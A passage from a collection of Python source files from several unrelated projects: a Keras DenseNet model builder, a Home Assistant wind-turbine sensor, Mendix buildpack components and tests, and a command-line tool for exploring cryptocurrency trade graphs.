raise ValueError()
with open(file, 'r') as f:
items = yaml.load(f, Loader=yaml.FullLoader)
return items
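# --- Hypothetical usage sketch (not part of the original module) ---
# The 'config.yaml' file and the overridden keys below are illustrative only.
def _example_load_config():
    config = Config()
    # Defaults are available immediately...
    assert config['OPTIMIZE'] is True
    # ...and can be overridden from a yaml file containing, for example:
    #   OPTIMIZE: false
    #   ALLOWED_FILE_TYPES: [png]
    config.load('config.yaml')
    return config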
``` |
{
"source": "jobvink/SnapshotEnsembles",
"score": 3
} |
#### File: SnapshotEnsembles/models/dense_net.py
```python
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Dense, Dropout, Activation
from tensorflow.keras.layers import Conv2D
from tensorflow.keras.layers import AveragePooling2D
from tensorflow.keras.layers import GlobalAveragePooling2D
from tensorflow.keras.layers import Input, Concatenate
from tensorflow.keras.layers import BatchNormalization
from tensorflow.keras.regularizers import l2
import tensorflow.keras.backend as K
def conv_block(ip, nb_filter, dropout_rate=None, weight_decay=1E-4):
    ''' Apply BatchNorm, Relu and 3x3 Conv2D, with optional dropout
Args:
ip: Input tensorflow.keras tensor
nb_filter: number of filters
dropout_rate: dropout rate
weight_decay: weight decay factor
Returns: tensorflow.keras tensor with batch_norm, relu and Conv2D added
'''
concat_axis = 1 if K.image_data_format() == 'channels_first' else -1
x = BatchNormalization(axis=concat_axis, gamma_regularizer=l2(weight_decay),
beta_regularizer=l2(weight_decay))(ip)
x = Activation('relu')(x)
x = Conv2D(nb_filter, (3, 3), kernel_initializer='he_uniform', padding="same", use_bias=False,
activity_regularizer=l2(weight_decay))(x)
if dropout_rate:
x = Dropout(dropout_rate)(x)
return x
def transition_block(ip, nb_filter, dropout_rate=None, weight_decay=1E-4):
    ''' Apply BatchNorm, Relu and 1x1 Conv2D, with optional dropout and AveragePooling2D
Args:
ip: tensorflow.keras tensor
nb_filter: number of filters
dropout_rate: dropout rate
weight_decay: weight decay factor
    Returns: tensorflow.keras tensor, after applying batch_norm, relu-conv, dropout and average pooling
'''
concat_axis = 1 if K.image_data_format() == 'channels_first' else -1
x = BatchNormalization(axis=concat_axis, gamma_regularizer=l2(weight_decay),
beta_regularizer=l2(weight_decay))(ip)
x = Activation('relu')(x)
x = Conv2D(nb_filter, (1, 1), kernel_initializer='he_uniform', padding="same", use_bias=False,
activity_regularizer=l2(weight_decay))(x)
if dropout_rate:
x = Dropout(dropout_rate)(x)
x = AveragePooling2D((2, 2), strides=(2, 2))(x)
return x
def dense_block(x, nb_layers, nb_filter, growth_rate, dropout_rate=None, weight_decay=1E-4):
''' Build a dense_block where the output of each conv_block is fed to subsequent ones
Args:
x: tensorflow.keras tensor
nb_layers: the number of layers of conv_block to append to the model.
nb_filter: number of filters
growth_rate: growth rate
dropout_rate: dropout rate
weight_decay: weight decay factor
Returns: tensorflow.keras tensor with nb_layers of conv_block appended
'''
concat_axis = 1 if K.image_data_format() == 'channels_first' else -1
feature_list = [x]
for i in range(nb_layers):
x = conv_block(x, growth_rate, dropout_rate, weight_decay)
feature_list.append(x)
x = Concatenate(axis=concat_axis)(feature_list)
nb_filter += growth_rate
return x, nb_filter
def create_dense_net(nb_classes, img_dim, depth=40, nb_dense_block=1, growth_rate=12, nb_filter=16, dropout_rate=None,
weight_decay=1E-4, verbose=True):
''' Build the create_dense_net model
Args:
nb_classes: number of classes
img_dim: tuple of shape (channels, rows, columns) or (rows, columns, channels)
        depth: number of layers
nb_dense_block: number of dense blocks to add to end
growth_rate: number of filters to add
nb_filter: number of filters
dropout_rate: dropout rate
weight_decay: weight decay
    Returns: tensorflow.keras Model for the constructed DenseNet
'''
model_input = Input(shape=img_dim)
concat_axis = 1 if K.image_data_format() == 'channels_first' else -1
assert (depth - 4) % 3 == 0, "Depth must be 3 N + 4"
# layers in each dense block
nb_layers = int((depth - 4) / 3)
# Initial convolution
x = Conv2D(nb_filter, (3, 3), padding="same", kernel_initializer='he_uniform', name="initial_conv2D", use_bias=False,
activity_regularizer=l2(weight_decay))(model_input)
# Add dense blocks
for block_idx in range(nb_dense_block - 1):
x, nb_filter = dense_block(x, nb_layers, nb_filter, growth_rate, dropout_rate=dropout_rate,
weight_decay=weight_decay)
# add transition_block
x = transition_block(x, nb_filter, dropout_rate=dropout_rate, weight_decay=weight_decay)
# The last dense_block does not have a transition_block
x, nb_filter = dense_block(x, nb_layers, nb_filter, growth_rate, dropout_rate=dropout_rate,
weight_decay=weight_decay)
x = BatchNormalization(gamma_regularizer=l2(weight_decay),
beta_regularizer=l2(weight_decay))(x)
x = Activation('relu')(x)
x = GlobalAveragePooling2D()(x)
x = Dense(nb_classes, activation='softmax', activity_regularizer=l2(weight_decay), bias_regularizer=l2(weight_decay))(x)
densenet = Model(inputs=model_input, outputs=x, name="create_dense_net")
if verbose: print("DenseNet-%d-%d created." % (depth, growth_rate))
return densenet
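# --- Hypothetical usage sketch (not part of the original module) ---
# Builds a DenseNet-40 for 32x32 RGB images with 10 classes (CIFAR-10-like);
# the hyperparameters and compile settings below are illustrative only.
def _example_build_densenet():
    model = create_dense_net(nb_classes=10, img_dim=(32, 32, 3), depth=40,
                             nb_dense_block=3, growth_rate=12, nb_filter=16,
                             dropout_rate=0.2)
    model.compile(optimizer='adam', loss='categorical_crossentropy',
                  metrics=['accuracy'])
    return model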
``` |
{
"source": "jobvk/Home-Assistant-Windcentrale",
"score": 2
} |
#### File: custom_components/windcentrale/binary_sensor.py
```python
from homeassistant.components.binary_sensor import BinarySensorEntity
from .const import DOMAIN
async def async_setup_entry(hass, config_entry, async_add_devices):
"""Add sensors for passed config_entry in HA."""
wind = hass.data[DOMAIN][config_entry.entry_id]
new_devices = []
for windturbine in wind.windturbines:
new_devices.append(PulsingSensor(windturbine))
if new_devices:
async_add_devices(new_devices)
class SensorBase(BinarySensorEntity):
"""Base representation of a windcentrale turbine."""
def __init__(self, windturbine):
"""Initialize the sensor."""
self._windturbine = windturbine
@property
def device_info(self):
"""Information about this wind turbine"""
return {
"identifiers": {(DOMAIN, self._windturbine.windturbine_id)},
"name": self._windturbine.name,
"model": self._windturbine.model,
"manufacturer": self._windturbine.manufacturer,
}
@property
def available(self) -> bool:
"""Return true if windturbine live sensor is available."""
return self._windturbine.live_status
class PulsingSensor(SensorBase):
"""Representation of a Sensor."""
def __init__(self, windturbine):
"""Initialize the sensor."""
super().__init__(windturbine)
self._state = None
@property
def unique_id(self) -> str:
"""Unique ID for the sensor."""
return f"{self._windturbine.name} Pulsating"
@property
def name(self) -> str:
"""Name for the sensor."""
return f"{self._windturbine.name} Pulsating"
@property
def state(self) -> bool:
"""State value for the sensor."""
return self._state
@property
def icon(self) -> str:
"""Icon for the sensor."""
return "mdi:pulse"
def update(self):
"""Update the sensor."""
if self._windturbine.live_data:
self._state = self._windturbine.live_data["pulsating"]
return self._state
else:
return None
``` |
{
"source": "jobvs/cf-mendix-buildpack",
"score": 2
} |
#### File: scripts/generators/stream.py
```python
import json
from buildpack.databroker.config_generator.scripts.utils import (
template_engine_instance,
)
def generate_config(config):
topologies = {"topologies": []}
env = template_engine_instance()
template = env.get_template("streaming_producer.json.j2")
for service in config.DataBrokerConfiguration.publishedServices:
for entity in service.entities:
renderedTemplate = template.render(entity=entity)
renderedTemplateAsJson = json.loads(renderedTemplate)
topologies["topologies"].append(renderedTemplateAsJson)
return json.dumps(topologies)
```
#### File: buildpack/databroker/connect.py
```python
import os
import time
import logging
import json
import backoff
import requests
from buildpack import util
from buildpack.databroker.process_supervisor import DataBrokerProcess
from buildpack.databroker.config_generator.scripts.generators import (
debezium as debezium_generator,
kafka_connect as connect_generator,
loggers as loggers_generator,
)
from buildpack.databroker.config_generator.scripts.utils import write_file
# Compile constants
BASE_URL = "/mx-buildpack/experimental/databroker/"
KAFKA_CONNECT_FILENAME = "kafka-connect"
KAFKA_CONNECT_VERSION = "2.13-2.5.1-v2"
DBZ_FILENAME = "debezium"
PKG_FILE_EXT = "tar.gz"
BASE_DIR = "databroker"
DBZ_DIR = "debezium"
PROCESS_NAME = "kafka-connect"
KAFKA_CONNECT_DIR = PROCESS_NAME
DBZ_CFG_NAME = "debezium-connector.json"
KAFKA_CONNECT_CFG_NAME = "connect.properties"
LOG4J_DEBEZIUM_CFG_NAME = "debezium-log4j.properties"
DEFAULT_DBZ_VERSION = "1.2.0"
DBZ_VERSION = os.getenv("DATABROKER_DBZ_VERSION")
if not DBZ_VERSION:
DBZ_VERSION = DEFAULT_DBZ_VERSION
# Run constants
LOCAL = ".local"
KAFKA_CONNECT_START_PATH = os.path.join(
LOCAL, BASE_DIR, KAFKA_CONNECT_DIR, "bin", "connect-distributed.sh"
)
KAFKA_CONNECT_CFG_PATH = os.path.join(
LOCAL, BASE_DIR, KAFKA_CONNECT_DIR, KAFKA_CONNECT_CFG_NAME
)
LOG4J_CFG_PATH = os.path.join(
LOCAL, BASE_DIR, KAFKA_CONNECT_DIR, LOG4J_DEBEZIUM_CFG_NAME
)
DBZ_HOME_DIR = os.path.join(LOCAL, BASE_DIR, DBZ_DIR)
CONNECT_URL = "http://localhost:8083/connectors"
INITIAL_WAIT = 15
MAX_RETRIES = 8
BACKOFF_TIME = 5
KAFKA_CONNECT_JMX_PORT = "11003"
def _download_pkgs(install_path, cache_dir):
# Download kafka connect and debezium
KAFKA_CONNECT_DOWNLOAD_URL = "{}{}-{}.{}".format(
BASE_URL, KAFKA_CONNECT_FILENAME, KAFKA_CONNECT_VERSION, PKG_FILE_EXT,
)
util.download_and_unpack(
util.get_blobstore_url(KAFKA_CONNECT_DOWNLOAD_URL),
os.path.join(install_path, BASE_DIR, KAFKA_CONNECT_DIR),
cache_dir=cache_dir,
)
DBZ_DOWNLOAD_URL = "{}{}-{}.{}".format(
BASE_URL, DBZ_FILENAME, DBZ_VERSION, PKG_FILE_EXT
)
util.download_and_unpack(
util.get_blobstore_url(DBZ_DOWNLOAD_URL),
os.path.join(install_path, BASE_DIR, DBZ_DIR),
cache_dir=cache_dir,
)
def stage(install_path, cache_dir):
_download_pkgs(install_path, cache_dir)
def setup_configs(complete_conf):
connect_config = connect_generator.generate_config(complete_conf)
write_file(KAFKA_CONNECT_CFG_PATH, connect_config)
connect_logging = loggers_generator.generate_kafka_connect_logging_config(
complete_conf
)
write_file(LOG4J_CFG_PATH, connect_logging)
def run(complete_conf):
setup_configs(complete_conf)
java_path = os.path.join(os.getcwd(), LOCAL, "bin")
os.environ["PATH"] += os.pathsep + java_path
os.environ["JMX_PORT"] = KAFKA_CONNECT_JMX_PORT
os.environ["KAFKA_LOG4J_OPTS"] = (
"-Dlog4j.configuration=file:"
+ os.path.join(os.getcwd(), LOG4J_CFG_PATH)
)
kafka_connect_heap_opts = os.environ.get(
"DATABROKER_KAFKA_CONNECT_HEAP_OPTS", "-Xms512M -Xmx2G"
)
os.environ["KAFKA_HEAP_OPTS"] = kafka_connect_heap_opts
env = dict(os.environ)
kafka_connect_process = DataBrokerProcess(
PROCESS_NAME, (KAFKA_CONNECT_START_PATH, KAFKA_CONNECT_CFG_PATH), env,
)
# Wait for kafka connect to initialize and then issue a request for debezium connector
time.sleep(INITIAL_WAIT)
debezium_config = json.loads(
debezium_generator.generate_config(complete_conf)
)
def backoff_hdlr(details):
        logging.warning(
"Databroker: Failed to receive successful response from connect. Retrying...({}/{})".format(
details["tries"], MAX_RETRIES
)
)
def giveup_hdlr(details):
logging.error("Databroker: Kafka Connect wait retries exhaused")
raise Exception("Databroker: Kafka Connect failed to start")
@backoff.on_predicate(
backoff.constant,
interval=BACKOFF_TIME,
max_tries=MAX_RETRIES,
on_backoff=backoff_hdlr,
on_giveup=giveup_hdlr,
)
@backoff.on_exception(
backoff.constant,
Exception,
interval=BACKOFF_TIME,
max_tries=MAX_RETRIES,
on_backoff=backoff_hdlr,
on_giveup=giveup_hdlr,
)
def start_debezium_connector():
return requests.put(
"{}/{}/{}".format(CONNECT_URL, debezium_config["name"], "config"),
json=debezium_config["config"],
)
start_debezium_connector()
return kafka_connect_process
```
#### File: lib/m2ee/util.py
```python
import os
import shutil
import subprocess
import socket
import http.client
from .log import logger
try:
import readline
# allow - in filenames we're completing without messing up completion
readline.set_completer_delims(
readline.get_completer_delims().replace("-", "")
)
except ImportError:
pass
try:
import httplib2
except ImportError:
logger.critical(
"Failed to import httplib2. This module is needed by "
"m2ee. Please povide it on the python library path"
)
raise
def unpack(config, mda_name):
mda_file_name = os.path.join(config.get_model_upload_path(), mda_name)
if not os.path.isfile(mda_file_name):
logger.error("file %s does not exist" % mda_file_name)
return False
logger.debug("Testing archive...")
cmd = ("unzip", "-tqq", mda_file_name)
logger.trace("Executing %s" % str(cmd))
try:
proc = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
(stdout, stderr) = proc.communicate()
if proc.returncode != 0:
logger.error(
"An error occured while testing archive " "consistency:"
)
logger.error("stdout: %s" % stdout)
logger.error("stderr: %s" % stderr)
return False
else:
logger.trace("stdout: %s" % stdout)
logger.trace("stderr: %s" % stderr)
except OSError as ose:
import errno
if ose.errno == errno.ENOENT:
logger.error(
"The unzip program could not be found: %s" % ose.strerror
)
else:
logger.error("An error occured while executing unzip: %s" % ose)
return False
logger.debug("Removing everything in model/ and web/ locations...")
# TODO: error handling. removing model/ and web/ itself should not be
# possible (parent dir is root owned), all errors ignored for now
app_base = config.get_app_base()
shutil.rmtree(os.path.join(app_base, "model"), ignore_errors=True)
shutil.rmtree(os.path.join(app_base, "web"), ignore_errors=True)
logger.debug("Extracting archive...")
cmd = ("unzip", "-oq", mda_file_name, "web/*", "model/*", "-d", app_base)
logger.trace("Executing %s" % str(cmd))
proc = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
(stdout, stderr) = proc.communicate()
if proc.returncode != 0:
logger.error("An error occured while extracting archive:")
logger.error("stdout: %s" % stdout)
logger.error("stderr: %s" % stderr)
return False
else:
logger.trace("stdout: %s" % stdout)
logger.trace("stderr: %s" % stderr)
# XXX: reset permissions on web/ model/ to be sure after executing this
# function
return True
def fix_mxclientsystem_symlink(config):
logger.debug("Running fix_mxclientsystem_symlink...")
mxclient_symlink = os.path.join(
config.get_public_webroot_path(), "mxclientsystem"
)
logger.trace("mxclient_symlink: %s" % mxclient_symlink)
real_mxclientsystem_path = config.get_real_mxclientsystem_path()
logger.trace("real_mxclientsystem_path: %s" % real_mxclientsystem_path)
if os.path.islink(mxclient_symlink):
current_real_mxclientsystem_path = os.path.realpath(mxclient_symlink)
if current_real_mxclientsystem_path != real_mxclientsystem_path:
logger.debug(
"mxclientsystem symlink exists, but points "
"to %s" % current_real_mxclientsystem_path
)
logger.debug(
"redirecting symlink to %s" % real_mxclientsystem_path
)
os.unlink(mxclient_symlink)
os.symlink(real_mxclientsystem_path, mxclient_symlink)
elif not os.path.exists(mxclient_symlink):
logger.debug(
"creating mxclientsystem symlink pointing to %s"
% real_mxclientsystem_path
)
try:
os.symlink(real_mxclientsystem_path, mxclient_symlink)
except OSError as e:
logger.error("creating symlink failed: %s" % e)
else:
logger.warn(
"Not touching mxclientsystem symlink: file exists "
"and is not a symlink"
)
def run_post_unpack_hook(post_unpack_hook):
if os.path.isfile(post_unpack_hook):
if os.access(post_unpack_hook, os.X_OK):
logger.info("Running post-unpack-hook: %s" % post_unpack_hook)
retcode = subprocess.call((post_unpack_hook,))
if retcode != 0:
logger.error(
"The post-unpack-hook returned a "
"non-zero exit code: %d" % retcode
)
else:
logger.error(
"post-unpack-hook script %s is not "
"executable." % post_unpack_hook
)
else:
logger.error(
"post-unpack-hook script %s does not exist." % post_unpack_hook
)
def check_download_runtime_existence(url):
h = httplib2.Http(timeout=10)
logger.debug("Checking for existence of %s via HTTP HEAD" % url)
try:
(response_headers, response_body) = h.request(url, "HEAD")
logger.trace("Response headers: %s" % response_headers)
except (
httplib2.HttpLib2Error,
http.client.HTTPException,
socket.error,
) as e:
logger.error(
"Checking download url %s failed: %s: %s"
% (url, e.__class__.__name__, e)
)
return False
if response_headers["status"] == "200":
logger.debug("Ok, got HTTP 200")
return True
if response_headers["status"] == "404":
logger.error("The location %s cannot be found." % url)
return False
logger.error(
"Checking download url %s failed, HTTP status code %s"
% (url, response_headers["status"])
)
return False
def download_and_unpack_runtime(url, path):
if not check_download_runtime_existence(url):
return
logger.info("Going to download and extract %s to %s" % (url, path))
p1 = subprocess.Popen(["wget", "-O", "-", url,], stdout=subprocess.PIPE)
p2 = subprocess.Popen(
["tar", "xz", "-C", path,], stdin=p1.stdout, stdout=subprocess.PIPE
)
p1.stdout.close()
stdout, stderr = p2.communicate()
if p2.returncode == 0:
logger.info("Successfully downloaded runtime!")
return True
else:
logger.error("Could not download and unpack runtime:")
logger.error(stderr)
return False
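# --- Hypothetical usage sketch (not part of the original module) ---
# The download URL and target directory below are illustrative only.
def _example_download_runtime():
    url = "https://download.example.com/runtime/mendix-9.0.0.tar.gz"
    return download_and_unpack_runtime(url, "/tmp/runtimes")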
```
#### File: tests/integration/test_termination.py
```python
from tests.integration import basetest
class TestCaseTermination(basetest.BaseTest):
# Tests that the process terminates with a stack trace when Python code
# errors. The env variable S3_ENCRYPTION_KEYS is used here, it doesn't
# have a try-except on it.
# TODO determine if we can unit test this / should test this
def test_termination_stacktrace(self):
self.stage_container(
"Mendix8.1.1.58432_StarterApp.mda",
env_vars={"S3_ENCRYPTION_KEYS": "{invalid-json}"},
)
with self.assertRaises(RuntimeError):
self.start_container()
self.assert_string_in_recent_logs(
'json.loads(os.getenv("S3_ENCRYPTION_KEYS"))'
)
def test_termination_broken_application(self):
self.stage_container(
"Sample-StartError-7.23.2.mda",
env_vars={
"DEPLOY_PASSWORD": <PASSWORD>,
"METRICS_INTERVAL": "10",
},
)
self.start_container(status="unhealthy")
self.assert_string_in_recent_logs("start failed, stopping")
self.assert_string_not_in_recent_logs("health check never passed")
def test_java_crash_triggers_unhealthy(self):
self.stage_container(
"sample-6.2.0.mda",
env_vars={
"DEPLOY_PASSWORD": <PASSWORD>,
"METRICS_INTERVAL": "10",
},
)
self.start_container()
self.assert_app_running()
self.run_on_container("killall java")
assert self.await_container_status("unhealthy", 60)
```
#### File: tests/unit/test_db_config_options.py
```python
import os
import unittest
from buildpack.runtime_components.database import get_config
class TestDatabaseConfigOptions(unittest.TestCase):
def clean_env(self):
        # Setting different environment variables for tests in the same process
# can lead to flaky tests.
if "DATABASE_URL" in os.environ.keys():
del os.environ["DATABASE_URL"]
for key in filter(
lambda x: x.startswith("MXRUNTIME_Database"),
list(os.environ.keys()),
):
del os.environ[key]
def test_no_setup(self):
self.clean_env()
with self.assertRaises(RuntimeError):
get_config()
def test_mx_runtime_db_config(self):
# Test if MXRUNTIME variables are set up if no database configuration is returned
# based on DATABASE_URL or VCAP_SERVICES
self.clean_env()
os.environ["MXRUNTIME_DatabaseType"] = "PostgreSQL"
os.environ[
"MXRUNTIME_DatabaseJdbcUrl"
] = "jdbc:postgresql://username:password@rdsbroker-testfree-nonprod-1-eu-west-1.asdbjasdg.eu-west-1.rds.amazonaws.com:5432/testdatabase" # noqa E501
config = get_config()
assert not config
def test_database_url(self):
self.clean_env()
os.environ[
"DATABASE_URL"
] = "jdbc:postgres://user:secret@host/database"
config = get_config()
assert config
assert config["DatabaseType"] == "PostgreSQL"
def test_vcap(self):
self.clean_env()
os.environ[
"VCAP_SERVICES"
] = """
{
"rds-testfree": [
{
"binding_name": null,
"credentials": {
"db_name": "dbuajsdhkasdhaks",
"host": "rdsbroker-testfree-nonprod-1-eu-west-1.asdbjasdg.eu-west-1.rds.amazonaws.com",
"password": "<PASSWORD>",
"uri": "postgres://ua98s7ananla:na8<EMAIL>:5432/dbuajsdhkasdhaks",
"username": "ua98s7ananla"
},
"instance_name": "ops-432a659e.test.foo.io-database",
"label": "rds-testfree",
"name": "ops-432a659e.test.foo.io-database",
"plan": "shared-psql-testfree",
"provider": null,
"syslog_drain_url": null,
"tags": [
"database",
"RDS",
"postgresql"
],
"volume_mounts": []
}
]
}
""" # noqa
config = get_config()
assert config
assert config["DatabaseType"] == "PostgreSQL"
``` |
{
"source": "JobyB/PoolBot",
"score": 3
} |
#### File: JobyB/PoolBot/loggingUtils.py
```python
from __future__ import (division, print_function)
import os
import sys
import yaml
import time
import logging
import logging.config
import logging.handlers
# Find our current dir and set our base dir
base_dir = os.path.dirname(os.path.abspath(__file__))
# Define the location to find logs
loggingPath = os.path.join(base_dir, 'logs')
# Define the available log levels
valid_log_levels = ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']
# Create a custom handler for files
class MyFileHandler(logging.handlers.RotatingFileHandler):
def __init__(self, filename, mode='a', encoding=None, delay=0, maxBytes=2097152, backupCount=5):
if not os.path.exists(loggingPath):
os.makedirs(loggingPath)
fullpath = os.path.join(loggingPath, filename)
logging.handlers.RotatingFileHandler.__init__(self, fullpath, mode=mode, encoding=encoding, delay=delay, maxBytes=maxBytes, backupCount=backupCount)
# Create a custom handler so critical level logs call sys.exit(1)
class ShutdownHandler(logging.StreamHandler):
def emit(self, record):
self.format(record)
logging.shutdown()
sys.exit(1)
def log_setup(logger_name, logging_level):
logging_data = yaml.safe_load(open(os.path.join(base_dir, 'conf', 'logging.yaml')))
# Update the console handler from cmd line if required
if logging_level != '':
if logging_level.upper() in valid_log_levels:
if logging_level.upper() != logging_data['handlers']['console']['level']:
print('Setting logging level from cmd line to: ' + str(logging_level.upper()))
logging_data['handlers']['console']['level'] = logging_level.upper()
else:
print('ERROR: ' + logging_level + ' is not a valid log level')
print('ERROR: Valid log levels: ' + str(valid_log_levels))
sys.exit(1)
# Load our logging config into the logger
logging.config.dictConfig(logging_data)
# Create an instance of our logger
log = logging.getLogger(logger_name)
log.info('')
log.info('#####################################')
log.info('System Init ' + str(time.strftime("%Y-%m-%d %H:%M:%S")))
log.info('#####################################')
return log
def shutdown_logging():
logging.shutdown()
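# --- Hypothetical usage sketch (not part of the original module) ---
# The logger name and command-line level override below are illustrative only.
def _example_usage():
    log = log_setup('PoolBot', 'DEBUG')
    log.debug('Console level overridden from the command line')
    log.info('Starting up')
    shutdown_logging()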
# execute as standalone program
if __name__ == '__main__':
print('This is a Python module, not designed to be run as a standalone program')
``` |
{
"source": "jobymathew/Cryptocurrency_Trade_Details_and_Overview",
"score": 4
} |
#### File: jobymathew/Cryptocurrency_Trade_Details_and_Overview/cryptoGraph.py
```python
import sys
import argparse
import numpy as np
import pickle
# importing copy to perform deep copy of classes
import copy
# importing csv to read the csv file
import csv
# Minh Dao - Tutor <NAME>
# Using the Graph class which I made during the practicals - Modified for the assignment
from DSAGraph import DSAGraph
from Asset import AssetObject
import json
# Setting up the argument parser
ap = argparse.ArgumentParser()
# Adding the argument for the interactive test environment
ap.add_argument("-i", "--interactive", help='interactive testing environment', action='store_true')
# Adding the argument for report mode
ap.add_argument("-r", "--report", nargs='+', help='report mode')
# Getting the argument variables
args = vars(ap.parse_args())
# Function to load the exchange data (asset data)
def loadAssetData():
for i, row in enumerate(asset_data):
if i != 0 and i != 1:
circulatingSupply = None
if row[7] == '?':
circulatingSupply = '0'
else:
circulatingSupply = row[7]
volume = None
if row[8] == '$?':
volume = '0'
else:
volumeSplit = row[8][1:].strip().split(',')
volume = ''
for val in volumeSplit:
volume += val
if i < 10:
priceSplit = row[5][1:].strip().split(',')
price = ''
for val in priceSplit:
price += val
assets.addAsset(row[1].strip(), row[2].strip(), row[4].strip(), price, circulatingSupply.strip(), volume, row[9][:-1].strip(), row[10][:-1].strip(), row[11][:-1].strip())
# Function to load the trade data
def loadTradeData():
for data in exchange_data['symbols']:
baseAsset = data['baseAsset']
quoteAsset = data['quoteAsset']
status = data['status']
if not graph.hasVertex(baseAsset):
graph.addVertex(baseAsset, 0)
if not graph.hasVertex(quoteAsset):
graph.addVertex(quoteAsset, 0)
graph.addEdge(baseAsset, quoteAsset, status)
for data in trade_data:
tradeName = data['symbol']
tradeEdge = graph.getTradeEdge(tradeName)
priceChange = data['priceChange']
priceChangePercent = data['priceChangePercent']
volume = data['volume']
count = data['count']
weightedAvgPrice = data['weightedAvgPrice']
quoteVolume = data['quoteVolume']
lowPrice = data['lowPrice']
highPrice = data['highPrice']
openPrice = data['openPrice']
# Adding data to the edge class
tradeEdge.setVolume(volume)
tradeEdge.setPriceChange(priceChange)
tradeEdge.setPriceChangePercent(priceChangePercent)
tradeEdge.setQuoteVolume(quoteVolume)
tradeEdge.setLowPrice(lowPrice)
tradeEdge.setHighPrice(highPrice)
tradeEdge.setOpenPrice(openPrice)
tradeEdge.setCount(count)
tradeEdge.setWeightedAvgPrice(weightedAvgPrice)
# Function to show the data loading options
def getLoadOptions():
choice = 0
while(choice != 4):
print('\n(1) Asset data\n(2) Trade data\n(3) Serialised Data\n(4) Exit')
choice = int(input())
if choice == 1:
loadAssetData()
print('Asset data has been loaded')
elif choice == 2:
loadTradeData()
print('Trade data has been loaded')
elif choice == 3:
readFromSerializedFile()
elif choice == 4:
            print('Exiting to the main menu\n')
else:
print('Wrong input, please try again\n')
# Function to display details related to the trade
def displayTradeDetails():
# Getting the input from the user
print("Input the trade name")
tradeName = input()
# Checking if trade edge exists
if graph.hasTradeEdge(tradeName):
graphEdge = graph.getTradeEdge(tradeName)
# Getting the two assets
baseAsset = graphEdge.getFromVertex()
quoteAsset = graphEdge.getToVertex()
# Displaying the trade details
print(f'\n{tradeName}')
print('\nStatus :', graphEdge.getStatus())
if graphEdge.getStatus() == 'TRADING':
print('24H Price :', graphEdge.getWeightedAvgPrice())
print(f'24H Price Change :', graphEdge.getPriceChange())
print(f'24H Price Change Percent :{graphEdge.getPriceChangePercent()}%')
print(f'24H High Price :', graphEdge.getHighPrice())
print(f'24H Low Price :', graphEdge.getLowPrice())
print(f'24H Volume ({baseAsset.getLabel()}) : {graphEdge.getVolume()}')
print(f'24H Volume ({quoteAsset.getLabel()}) : {graphEdge.getQuoteVolume()}')
print(f'24H Count :', graphEdge.getCount())
else:
print('No data as there is no trading')
else:
print("Trade doesn't exist")
# Function to display the details related to the asset
def displayAssetDetails():
print("Input the asset name")
assetName = input()
if assets.hasAsset(assetName):
asset = assets.getAsset(assetName)
print(f'\n{assetName}')
print('Name:', asset.getName())
print('Market Cap:', asset.getMarketCap())
print('Price:', asset.getPrice())
print('Circulating Supply:', asset.getCirculatingSupply())
print('Volume:', asset.getVolume())
print('One Hour Percent:'+asset.getOneHourPercent()+'%')
print('Twenty Four Hour Percent:'+asset.getTwentyFourHourPercent()+'%')
print('Seven Day Percent:'+asset.getSevenDayPercent()+'%')
else:
print("\nAsset doesn't exist\n")
# Function to compute and display the trade paths
def displayTradePaths():
# getting the base asset and quote asset from the user
print("Enter the base asset")
baseAsset = input()
print("Enter the quote asset")
quoteAsset = input()
# Getting the trade list
exchangeResults = graph.getTradeDetails(baseAsset, quoteAsset)
# Displaying the trade paths if present, else displaying no trade paths
if exchangeResults.size == 0:
print('\nNo Trade Paths\n')
else:
print("\nTrade paths\n")
bestPath = exchangeResults[2].head
print("Best Trade Path: ", end=' ')
while(bestPath != None):
print(bestPath.getValue(), end=' ')
bestPath = bestPath.getNext()
print()
print("Best Overall Exchange: ", exchangeResults[3])
print("\nAll the paths\n")
tradePath = exchangeResults[0].head
exchangePath = exchangeResults[1].head
while(tradePath != None):
trade = tradePath.getValue().head
print("Path:", end=' ')
while(trade != None):
print(trade.getValue(), end=' ')
trade = trade.getNext()
print()
print('Exchange: ', exchangePath.getValue())
tradePath = tradePath.getNext()
exchangePath = exchangePath.getNext()
# Function to read from serialized file
def readFromSerializedFile():
    # graph is defined at module level, so declare it global before replacing it
    global graph
    try:
        with open('serializedCrytoGraph.txt', 'rb') as dataFile:
            # loading the file
            graph = pickle.load(dataFile)
print("Graph has been read from the Serialized File")
except:
print("Error: object file does not exist")
# Function to write to file with serialization
def writeToSerializedFile():
try:
# Writing in the serialized file
with open('serializedCrytoGraph.txt', 'wb') as dataFile:
pickle.dump(graph, dataFile)
print('Graph has been written into the serialized file')
except:
print("Error: problem pickling object!")
# Function to filter an asset
def assetFilter():
choice = 0
# Getting the input from the user
print('\nEnter 1 for including an asset and 2 for ignoring an asset')
while(choice != 1 and choice != 2):
choice = int(input())
        if choice != 1 and choice != 2:
print('Wrong input, please try again\n')
print('Enter the asset name')
asset = input()
if choice == 1:
# checking if the asset is already present, else adding it back
if graph.hasVertex(asset):
print(f'{asset} already present in the graph')
else:
graph.addAsset(asset)
assets.addBackAsset(asset)
print(f'{asset} has been included in the graph')
else:
# ignoring the asset and its edges if it is present in the graph
if graph.hasVertex(asset):
graph.ignoreAsset(asset)
assets.ignoreAsset(asset)
print(f'{asset} has been ignored from the graph')
else:
print(f'{asset} already ignored from the graph')
# Entering the interactive mode
if args['interactive']:
# declaring the graph object
graph = DSAGraph()
# declaring the asset object
assets = AssetObject()
asset_file = open('asset_info.csv')
# Reading the csv
asset_data = csv.reader(asset_file)
# Reading trade files and converting to json
tradeFile = open('trade_file.json')
exchangeFile = open('asset_file.json')
trade_data = json.load(tradeFile)
exchange_data = json.load(exchangeFile)
# selecting the choice from the menu driven options
choice = 0
while(choice != 9):
print('\n----------Trade Menu----------\n(1) Load Data\n\t-Asset data\n\t-Trade data\n\t-Serialised Data\n(2) Find and display asset\n(3) Find and display trade details\n(4) Find and display potential trade paths\n(5) Set asset filter\n(6) Asset overview\n(7) Trade overview\n(8) Save data (serialised)\n(9) Exit')
choice = int(input())
if choice == 1:
getLoadOptions()
elif choice == 2:
displayAssetDetails()
elif choice == 3:
displayTradeDetails()
elif choice == 4:
displayTradePaths()
elif choice == 5:
assetFilter()
elif choice == 6:
assets.getAssetOverview()
elif choice == 7:
graph.getTradeOverview()
elif choice == 8:
writeToSerializedFile()
elif choice == 9:
print('Goodbye')
else:
